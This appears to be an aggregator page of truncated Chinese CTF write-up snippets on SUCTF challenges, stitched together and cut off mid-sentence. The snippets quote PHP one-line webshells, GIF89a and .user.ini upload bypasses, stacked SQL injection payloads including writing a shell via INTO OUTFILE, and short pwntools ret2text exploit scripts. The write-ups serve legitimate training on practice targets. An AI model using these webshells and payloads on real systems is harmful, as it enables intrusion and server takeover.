ICode9

时间：August 9 2022 测试发现不可以上传以.ph开头的后缀名文件。于是想到上传.htaccess文件+上传图片马的方式执行webshell，结果并没有成功。 为啥失败了呢？原来题目环境用的是Nginx服务器而不是Apache。而.htaccess是Apache的配置文件。 查资料发现.user.ini文件也可以构成php后门。

看到字符upload 就想到了文件上传漏洞 就先上传一个一句话木马试试 似乎直接上传不成功，可能是有什么过滤 再上传一个包含一句话木马的图片试试 发现提示不能是图片，这时候就不会了，在网上找了一下wp 发现需要修改一下木马的内容 GIF89a <script language='php'>@eval($_POST['a']

无壳直接进入查看main函数 v10 = __readfsqword(0x28u); puts("[sign in]"); printf("[input your flag]: "); __isoc99_scanf("%99s", v8); sub_96A(v8, v9); __gmpz_init_set_str(v7, "ad939ff59f6e70bcbfad406f2494993757eee98b91bc2

SUCTF 2019]EasyWeb 考点： 无数字字母shell利用.htaccess上传文件绕过open_basedir 源码审计 <?php function get_the_flag(){ // web admin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); //命名格式(u

记录一下一个小点 源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}&

suctf_2018_basic 查看保护 ret2text即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28575) else: r =

                       [SUCTF 2019]EasySQL 1——堆叠注入+sql_mode 前言        个人观点，若有误请指教 预备知识 当 sql_mode 设置了 PIPES_AS_CONCAT 时，|| 就是字符串连接符，相当于CONCAT() 函数 当 sql_mode 没有设置 PIPES_AS_CONCAT

SQL堆叠注入  这个就不再写原理了，之前也遇到很多了，就是一个sql语句";"后面可以继续执行sql查询语句。试一下堆叠注入查询数据库1;show databases;     查询表名1;show tables;     按着思路往下走查字段的时候就不行了1;show columns from Flag;     山穷水尽，百度wp,发现

[SUCTF 2019]CheckIn 1.首先尝试使用一句话木马 illegal suffix! 2.尝试使用改后缀名的方式进行上传，发现存在<?检测 @eval($_POST["a"]); 提示：exif_imagetype:not image!，说明存在exif_imagetype函数，这个函数就是简单的检测下文件的首格式，很简单加个GIF89a去尝试即可 最终成功上

[SUCTF 2018]MultiSQL 0x01前言 堆叠注入写shell 0x02预编译写shell 需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php' 为什么选favicon呢？写题目的时候我也不知道，后来上了shell我才知道，其他目录是没有写权限的 payload=set @a

[SUCTF 2018]annonymous 0x01前言 create_function()匿名函数名猜解 0x02 create_function()匿名函数名猜解 直接传入$MY没反映 查看wp发现生成的匿名函数其实是有名字的以%00lambda_[1-999] 直接爆破 获取flag

好长时间没有写博客了，水一篇文章 拿到题目发现让输入内容，尝试了一下只有三种回显，又发现是sql注入，于是fuzz一下。 第一种:500,显示内容为空，表示字段没有被过滤 第二种:523 表示当前字段都没有被过滤，可以用 第三种：为507，显示内容为nonono，可知已经被过滤掉了 仔细看会发现，报错注

打开靶场    输入数字1（经测验发现好像任意数字都会有回显）会有回显,而字符就不会有回显   这里需要注意的一个点就是输入字符后url上不会有回显，说明传参的方式是post而非get，查看源代码后证实了我们的猜测       惯例的使用单引号来检测注入点，发现没有回显，尝试使用堆叠注入

  解题过程： 打开后，是一个文件上传的界面，很明显这是关于文件上传漏洞方面的题目。 然后我们来试试相关的操作，看看能够得到哪些信息 1.上传一句话木马，1.php， 回显： 表示后缀名不能是php，可能是被过滤了 2.将1.php改为1.jpg， 回显： 表示题目把含有“<?”的文件过滤掉了 3.将一句话木

   文件上传，首先上传一张图片马试试 提示<?被过滤，可以用下面代码绕过 <script language="php">eval($_POST{attack});</script>          显示上传成功，和已经上传的文件 下面就是想办法上传有效的后门 根据尝试，大部分后缀例如php3，php4，phtml均被过滤了    这里观察可

方法一 尝试很多常规的注入方法都不行。 想到使用堆叠注入 查询下数据库 查询数据表 1;show columns from Flag;# 尝试查看flag中数据，失败。 之后看了WP，发现代码中语句是这样的，select $_GET['query'] || flag from flag，"||"在mysql中表示或，如果前一个操作数为真，则不看后面

BUU-WEB-[SUCTF 2019]CheckIn 看样子就知道又是一道文件上传题，但是没告诉我们可以上传什么文件。于是先尝试一个随便的txt文件。（传一句话木马会被拒） 告诉我们要上传图片格式。 根据exif_imagetype函数，首先要上传**.user.ini**文件 文件内容为： GIF89a auto_prepend_file

打开环境 发现好像是个文件上传漏洞发现可以传jgp格式的图 但是传被过滤的的就会出现 这里就要了解一个函数 exif_imagetype 函数简介 其实就是一个类型的比较 所以这里和其他文件上传设置的黑白名单没两样 可以直接魔术头绕过就行 然后进过测试发现文件名带ph的被过滤了所

GitHub上有源码（https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql） index.php源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara();

from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐

题目地址：https://buuoj.cn/challenges 解题思路 第一步：进入题目，一个输入栏，通过题目可知是sql注入攻击 第二步：测试sql语句 输入1' or '1'='1测试是否有漏洞，发现被拦截 查看是否存在堆叠注入漏洞，输入1;show tables;#发现存在堆叠漏洞 尝试使用堆叠注入查看flag，发现被被拦

打开就是源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem

[SUCTF 2019]EasySQL 一打开就是一个注入页面 尝试了一下常规的注入，都不能很好的注入。 那就尝试一下使用堆叠注入， 关键的查询代码是 select $post[‘query’]||flag from Flag 官方给的 payload 是 1;set sql_mode=PIPES_AS_CONCAT;select 1 拼接一下就是 select 1;set sql

0x00 打开网页如下 进行测试，发现有三种返回结果分别为： 空 Nonono. 返回数组结果 经过测试，还发现大多数的数组可以返回结果，字母返回为空，带有数据库查询关键字的返回 Nonono. 据我猜测，返回为空的应该是sql语句没有查询到结果 返回为 Nonono.的应该是存在过滤条件 还发现存在堆叠

知识点： 题目复现链接：https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 利用.user.ini上传\隐藏后门 参考链接：user.ini文件构成的PHP后门 条件： 1、服务器脚本语言为PHP 2、服务器使用CGI／FastCGI模式 3、上传目录下要有可执行的php文件 实例：上传.user.ini绕过黑名单检验 GIF89